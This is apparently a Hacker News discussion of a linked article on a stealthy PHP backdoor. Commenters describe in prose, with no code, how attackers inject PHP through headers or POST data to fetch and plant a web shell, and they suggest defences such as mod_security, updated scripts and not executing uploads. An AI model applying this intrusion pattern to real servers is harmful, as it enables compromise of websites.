
Hookworm Stealth PHP Backdoor - ssclafani
http://www.madirish.net/?article=489
======
jaryd
Poster is spot on that C99 is not very stealth. I remember getting hit with
this guy a few months ago -- very easy to diagnose and clean up.

~~~
OstiaAntica
How did you get hit by it? I don't understand the attack vector, unless you
are allowing php file uploads?

~~~
dibarra
A common way is just script vulnerabilities, allowing execution of arbitrary
code. I work at a popular webhosting company, and I've seen cases where apps
will execute PHP code inserted as a sooofed User-Agent, POST data, and other
weird places. The idea is that you send a payload that executes on the remote
host, GETs your shell from some free webhost or another compromised account,
and then saves it on the target machine. At that point, you're set.

mod_security can help for people running Apache, and so will using maintained
and up to date scripts.

~~~
Joakal
Another is don't run PHP scripts in the uploads directory. [0].

[0] "Pass Non-PHP Requests to PHP." <http://wiki.nginx.org/Pitfalls>

